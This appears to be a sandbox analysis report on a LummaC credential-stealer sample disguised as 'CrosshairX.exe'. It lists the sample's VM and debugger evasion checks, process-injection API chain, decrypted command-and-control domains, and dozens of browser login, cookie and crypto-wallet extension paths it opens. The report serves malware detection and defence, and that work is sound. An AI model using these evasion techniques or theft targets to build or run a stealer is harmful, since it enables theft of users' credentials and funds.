Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\CrosshairX.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\CrosshairX.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe	Memory allocated: 9A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Memory allocated: 2380000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe

Window / User API: threadDelayed 6753

Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe TID: 7424	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe TID: 7752	Thread sleep count: 6753 > 30			Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\CrosshairX.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\CrosshairX.exe	Last function: Thread delayed

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: CrosshairX.exe, 00000003.00000002.2909106005.000000000137C000.00000004.00000020.00020000.00000000.sdmp, CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\CrosshairX.exe

API call chain: ExitProcess graph end node

graph_3-14990

Source: C:\Users\user\Desktop\CrosshairX.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe

Code function: 3_2_00442EE0 LdrInitializeThunk,

3_2_00442EE0

Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 0_2_02647F39 mov edi, dword ptr fs:[00000030h]		0_2_02647F39
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 0_2_026480B6 mov edi, dword ptr fs:[00000030h]		0_2_026480B6

Source: C:\Users\user\Desktop\CrosshairX.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\CrosshairX.exe

Code function: 0_2_02647F39 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02647F39

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\CrosshairX.exe

Memory written: C:\Users\user\Desktop\CrosshairX.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: undesirabkel.click

Source: C:\Users\user\Desktop\CrosshairX.exe	Process created: C:\Users\user\Desktop\CrosshairX.exe "C:\Users\user\Desktop\CrosshairX.exe"			Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process created: C:\Users\user\Desktop\CrosshairX.exe "C:\Users\user\Desktop\CrosshairX.exe"			Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe	Queries volume information: C:\Users\user\Desktop\CrosshairX.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\CrosshairX.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: CrosshairX.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: CrosshairX.exe, 00000003.00000002.2909333934.000000000142B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
